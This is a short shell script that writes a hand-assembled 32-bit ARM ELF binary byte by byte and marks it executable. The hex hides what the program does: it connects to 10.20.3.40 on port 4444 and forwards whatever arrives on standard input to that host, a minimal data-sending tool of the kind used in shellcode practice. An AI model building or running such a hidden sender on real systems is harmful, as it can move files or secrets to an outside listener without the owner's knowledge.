rm -f sockconnect_nothumb
printf "%b" "\x7f\x45\x4c\x46\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00" >> sockconnect_nothumb
printf "%b" "\x02\x00\x28\x00\x20\x00\x20\x00\x20\x00\x20\x00\x04\x00\x00\x00" >> sockconnect_nothumb
printf "%b" "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x34\x00\x20\x00\x01\x00\x00\x00" >> sockconnect_nothumb
printf "%b" "\x02\x20\x22\xe0\xc8\x70\xa0\xe3\x51\x70\x87\xe2\x00\x00\x00\xef" >> sockconnect_nothumb
printf "%b" "\x00\x40\xa0\xe1\x5c\x10\x8f\xe2\x10\x20\xa0\xe3\x02\x70\x87\xe2" >> sockconnect_nothumb
printf "%b" "\x00\x00\x00\xef\x01\x30\xa0\xe3\x03\x35\xa0\xe1\x0d\x10\xa0\xe1" >> sockconnect_nothumb
printf "%b" "\x03\x10\x41\xe0\x01\xd0\xa0\xe1\x00\x00\xa0\xe3\x03\x20\xa0\xe1" >> sockconnect_nothumb
printf "%b" "\x03\x70\xa0\xe3\x00\x00\x00\xef\x00\x20\xa0\xe1\x04\x00\xa0\xe1" >> sockconnect_nothumb
printf "%b" "\x04\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\x52\xe3\xf5\xff\xff\xca" >> sockconnect_nothumb
printf "%b" "\x04\x00\xa0\xe1\x06\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\x20\xe0" >> sockconnect_nothumb
printf "%b" "\x01\x70\xa0\xe3\x00\x00\x00\xef\x02\x00\x11\x5c\x0a\x14\x03\x28" >> sockconnect_nothumb
chmod +x sockconnect_nothumb
